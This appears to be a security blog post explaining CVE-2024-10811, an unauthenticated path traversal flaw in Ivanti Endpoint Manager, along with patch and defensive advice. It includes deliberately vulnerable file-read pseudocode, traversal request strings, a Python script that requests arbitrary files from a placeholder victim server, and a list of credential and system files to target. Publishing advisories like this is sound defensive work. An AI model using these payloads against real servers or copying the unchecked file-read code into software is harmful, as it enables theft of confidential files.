CVE CyberSecurity Database News

CVE-2024-10811 - How Path Traversal in Ivanti EPM Exposes Sensitive Information

Poster -

Recently, a critical vulnerability—CVE-2024-10811—was discovered in Ivanti Endpoint Manager (EPM). If you use this popular IT management tool, especially versions before the January 2025 Security Update or 2022 SU6 January-2025 Security Update, you need to pay close attention. This post dives into what the bug is, how it can be exploited, and what you should do next. We’ll walk through the vulnerability in plain language and include sample attack code to show the real impact.

What is CVE-2024-10811?

CVE-2024-10811 is an absolute path traversal vulnerability in Ivanti EPM. Path traversal bugs allow attackers to access files stored outside the intended directories—sometimes, even sensitive system files—by manipulating file paths in HTTP requests. What makes this one really dangerous is that it can be exploited remotely and without authentication.

In this case, if you’re running a vulnerable version, an attacker can craft a simple HTTP request to your EPM web service to read any file on your server. This could include database configs, password files, or internal logs—basically, anything the EPM service account can access.

Ivanti rates this vulnerability as high severity given its potential impact.

References

- NVD Entry for CVE-2024-10811
- Ivanti Security Advisory *(Example URL, check with Ivanti for updates)*

How Does the Exploit Work?

The classic attack technique is to use sequences like ../../ (dot-dot-slash) in file paths to reach parent directories. "Absolute" path traversal means the attacker can supply a full (rooted) path like /etc/passwd directly.

Imagine an HTTP endpoint like /api/download?file=report.pdf. The backend code might read any file given in the file parameter — but fails to check if the path leaves the intended directory. Here’s a simplified (vulnerable) code example:

# Example pseudocode: Vulnerable file read logic

def download_file(path):
    with open("/var/www/data/" + path, "rb") as f:
        return f.read()

With no filtering, an attacker can request

/api/download?file=../../../../etc/passwd

Or even

/api/download?file=/etc/passwd

Real-World Exploit Example

To show how easy it can be, here’s a Python snippet simulating an attack against a vulnerable Ivanti EPM server:

import requests

target = "https://victim-epm-server.com";
# Trying to read the Windows hosts file as an example
payload = {
    "file": "C:\\Windows\\System32\\drivers\\etc\\hosts"
}

# This is a hypothetical endpoint, check your Ivanti EPM install
url = f"{target}/api/download"

response = requests.get(url, params=payload, verify=False)

if response.status_code == 200:
    print("[+] Leaked file contents:")
    print(response.text)
else:
    print("[-] Request failed. Status code:", response.status_code)

Note: Actual vulnerable endpoints and parameter names depend on your Ivanti EPM version and plugins. But the pattern is the same: attacker sends a request with an arbitrary file path and the server returns the contents.

Windows: C:\Windows\System32\config\SAM, C:\Users\Administrator\AppData\...

- Linux: /etc/passwd, /etc/shadow (if permissions allow), /var/log/ivanti/epm/*.log

Database credentials or backups stored on the host

This could lead to escalation of privileges or a complete takeover if more sensitive files are recovered.

How Do You Fix This?

Apply the official Ivanti security update.

- Ivanti Downloads & Patches *(official portal)*
- CVE-2024-10811 at Mitre

Don't forget to disable public access and restrict Ivanti EPM to trusted networks whenever possible.

Defensive Tips

- Restrict file path input: Only allow file retrieval inside specific directories, never accept full absolute paths from user-controlled data.

Sanitize user input: Use safe, platform-specific path join functions and validate everything.

Least privilege: Run Ivanti EPM as a service account with minimal access to sensitive files.


- Monitor logs: Unexpected 200 responses to weird file requests can indicate attempted exploitation.

Summary

CVE-2024-10811 is a severe path traversal vulnerability in Ivanti EPM that makes it possible for remote, unauthenticated attackers to steal confidential files from your endpoint management servers.
Patch as soon as possible, and review your exposure to minimize risk. If your server handles sensitive data and isn't patched, it's only a matter of *when*, not *if*, someone tries this attack.

Have questions or want to add your own tips? Drop a comment below.

Timeline

Published on: 01/14/2025 17:15:14 UTC